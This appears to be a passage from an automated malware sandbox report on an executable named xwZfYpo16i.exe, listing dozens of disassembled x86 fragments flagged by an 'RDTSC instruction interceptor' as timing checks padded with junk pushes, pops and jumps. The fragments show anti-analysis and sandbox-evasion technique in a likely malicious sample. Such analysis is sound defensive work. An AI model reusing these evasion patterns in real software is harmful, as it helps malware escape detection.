Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 488E56 second address: 488E7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F6BF4F6516Fh 0x0000000a jmp 00007F6BF4F65163h 0x0000000f ja 00007F6BF4F65156h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 488FC7 second address: 488FCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 48E67E second address: 48E68B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 je 00007F6BF4F65156h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 48E93F second address: 48E945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 48E945 second address: 48E96D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4F65162h 0x00000007 jmp 00007F6BF4F65162h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 48EC27 second address: 48EC4F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6BF4B2C356h 0x00000008 jno 00007F6BF4B2C356h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jg 00007F6BF4B2C368h 0x00000016 jmp 00007F6BF4B2C360h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 48EC4F second address: 48EC55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 43ED3E second address: 43EDCA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6BF4B2C356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jng 00007F6BF4B2C360h 0x00000012 pushad 0x00000013 jbe 00007F6BF4B2C356h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c nop 0x0000001d push 00000000h 0x0000001f push edi 0x00000020 call 00007F6BF4B2C358h 0x00000025 pop edi 0x00000026 mov dword ptr [esp+04h], edi 0x0000002a add dword ptr [esp+04h], 0000001Bh 0x00000032 inc edi 0x00000033 push edi 0x00000034 ret 0x00000035 pop edi 0x00000036 ret 0x00000037 jns 00007F6BF4B2C364h 0x0000003d push 00000004h 0x0000003f push 00000000h 0x00000041 push esi 0x00000042 call 00007F6BF4B2C358h 0x00000047 pop esi 0x00000048 mov dword ptr [esp+04h], esi 0x0000004c add dword ptr [esp+04h], 0000001Dh 0x00000054 inc esi 0x00000055 push esi 0x00000056 ret 0x00000057 pop esi 0x00000058 ret 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d jmp 00007F6BF4B2C35Ah 0x00000062 pushad 0x00000063 popad 0x00000064 popad 0x00000065 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 43EDCA second address: 43EDDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6BF4F6515Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 43EDDC second address: 43EDE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 48EDD1 second address: 48EDDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 48EDDD second address: 48EE15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6BF4B2C35Fh 0x0000000b popad 0x0000000c pushad 0x0000000d jp 00007F6BF4B2C358h 0x00000013 jmp 00007F6BF4B2C364h 0x00000018 pushad 0x00000019 push edx 0x0000001a pop edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 48EE15 second address: 48EE32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6BF4F6515Fh 0x00000009 jnl 00007F6BF4F65156h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 48EE32 second address: 48EE3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F6BF4B2C356h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 48EF8C second address: 48EFA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jc 00007F6BF4F65156h 0x0000000c jnp 00007F6BF4F65156h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 48EFA0 second address: 48EFA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 48EFA5 second address: 48EFCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6BF4F6515Bh 0x00000009 jmp 00007F6BF4F65167h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 48EFCB second address: 48EFE9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6BF4B2C356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jng 00007F6BF4B2C356h 0x00000015 push edx 0x00000016 pop edx 0x00000017 jc 00007F6BF4B2C356h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 48EFE9 second address: 48EFEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 494A5C second address: 494A73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6BF4B2C363h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 493D57 second address: 493D5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 493ECE second address: 493ED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 49437F second address: 494389 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6BF4F65156h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 494507 second address: 49450C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 49450C second address: 494512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 49466D second address: 494685 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007F6BF4B2C356h 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push ebx 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 497351 second address: 497355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 497355 second address: 497382 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4B2C368h 0x00000007 jp 00007F6BF4B2C356h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jno 00007F6BF4B2C356h 0x00000016 push edi 0x00000017 pop edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 497382 second address: 497388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 497541 second address: 497546 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 497546 second address: 497557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007F6BF4F65156h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 497965 second address: 49797D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F6BF4B2C35Fh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 49E320 second address: 49E343 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6BF4F65166h 0x00000008 jns 00007F6BF4F65156h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 49E343 second address: 49E351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jng 00007F6BF4B2C356h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 49E351 second address: 49E357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 49E357 second address: 49E363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 49E363 second address: 49E376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 pushad 0x00000009 popad 0x0000000a jp 00007F6BF4F65156h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 49E4CF second address: 49E4D4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 49E654 second address: 49E669 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4F6515Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 49E669 second address: 49E674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F6BF4B2C356h 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 49E674 second address: 49E688 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6BF4F6515Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 49E688 second address: 49E690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 49F1C7 second address: 49F1CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 49F756 second address: 49F75C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 49F75C second address: 49F76B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F6BF4F6515Eh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 49F76B second address: 49F76F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 49F76F second address: 49F779 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6BF4F65162h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 49FD06 second address: 49FD0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 49FD0A second address: 49FD21 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6BF4F6515Ch 0x0000000b push esi 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4A196B second address: 4A1979 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4B2C35Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4A58A5 second address: 4A58B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F6BF4F65156h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F6BF4F65156h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4A58B8 second address: 4A58D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F6BF4B2C356h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007F6BF4B2C356h 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4A58D4 second address: 4A58D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4A4A7E second address: 4A4A86 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4A4A86 second address: 4A4AC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F6BF4F6515Eh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6BF4F6515Dh 0x00000016 jnl 00007F6BF4F65166h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4A4AC3 second address: 4A4AD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4B2C35Eh 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4A4EFD second address: 4A4F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4A5049 second address: 4A504F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4A504F second address: 4A5060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F6BF4F65158h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4A549F second address: 4A54A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4A55E2 second address: 4A55F8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6BF4F65160h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4A55F8 second address: 4A561B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6BF4B2C369h 0x00000009 jns 00007F6BF4B2C356h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4AB893 second address: 4AB897 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4B35A3 second address: 4B35B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6BF4B2C35Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4B1D7B second address: 4B1D83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4B1ED9 second address: 4B1EDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4B1EDF second address: 4B1EE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4B1EE3 second address: 4B1EE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4B2045 second address: 4B204A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4B204A second address: 4B2066 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6BF4B2C368h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4B2066 second address: 4B2084 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6BF4F65164h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4B2084 second address: 4B208A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4B208A second address: 4B208E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4B21F9 second address: 4B21FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4B2675 second address: 4B2679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4B2679 second address: 4B2685 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4B2685 second address: 4B2689 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4B2689 second address: 4B2697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4B2697 second address: 4B269B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4B269B second address: 4B26A6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4B2D3F second address: 4B2D44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4B2D44 second address: 4B2D50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F6BF4B2C356h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4B3444 second address: 4B344A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4B1350 second address: 4B135D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 ja 00007F6BF4B2C356h 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4B135D second address: 4B1369 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jne 00007F6BF4F65156h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4B8ADF second address: 4B8AED instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4BD591 second address: 4BD597 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4BD597 second address: 4BD59C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4BD59C second address: 4BD5A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4CABD0 second address: 4CABD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4CABD6 second address: 4CAC0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F6BF4F65160h 0x0000000c jnp 00007F6BF4F65156h 0x00000012 jmp 00007F6BF4F65167h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4CAC0B second address: 4CAC11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4CAD74 second address: 4CAD95 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6BF4F6515Eh 0x00000008 jnc 00007F6BF4F65156h 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F6BF4F6515Ah 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
